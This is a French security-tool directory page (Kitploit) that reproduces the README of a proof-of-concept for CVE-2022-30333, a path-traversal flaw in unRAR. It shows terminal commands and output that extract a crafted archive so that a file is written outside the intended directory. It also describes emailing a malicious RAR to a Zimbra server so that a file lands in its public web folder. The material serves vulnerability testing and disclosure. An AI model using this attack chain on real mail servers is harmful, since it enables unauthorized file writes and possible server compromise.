Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-30333-PoC — Exploit de preuve de concept pour CVE-2022-30333, une vulnérabilité de traversée de chemin dans unRAR permettant l'écriture arbitraire de fichiers sur les serveurs Linux et Zimbra via des archives RAR malveillantes. | Kitploit
Outils/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Exploit de preuve de concept pour CVE-2022-30333, une vulnérabilité de traversée de chemin dans unRAR permettant l'écriture arbitraire de fichiers sur les serveurs Linux et Zimbra via des archives RAR malveillantes.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
133il y a 4 ansPas encore vérifié

CVE-2022-30333-POC

Fichier exemple pour tester CVE-2022-30333

  • Sample.rar : si vous voulez tester sous Linux. Lors de l'extraction, il crée trav dans ../../tmp/traversed. Assurez-vous que le répertoire ../../tmp/traversed existe avant d'extraire Sample.rar

  • exp.rar : si vous voulez tester sur le serveur de messagerie Zimbra. Lors de l'extraction, il crée moo.txt dans /opt/zimbra/jetty_base/webapps/zimbra/public/. Vous pouvez accéder à ce fichier via https://zimbra_mail_domain/public/moo.txt

ÉTAPES D'EXPLOITATION

Test sous Linux

root@kitploit:~
mkdir ../../tmp/traversed (le dossier de destination doit exister avant unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Test sous Zimbra

  • Créez un e-mail et joignez le fichier rar malveillant, puis envoyez-le à une adresse e-mail Zimbra. Ce fichier rar sera extrait lors de son analyse par Amavisd.
  • Le fichier moo.txt devrait se trouver à : /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt ou https://zimbra_mail_domain/public/moo.txt

RÉFÉRENCES

  1. Blog vietnamien de DEV2SEC
  2. Blog anglais de Sonarsource
  3. Merci spécial à mrlihd pour m'avoir aidé à reconstruire la chaîne d'attaque dans Zimbra
Télécharger l’outil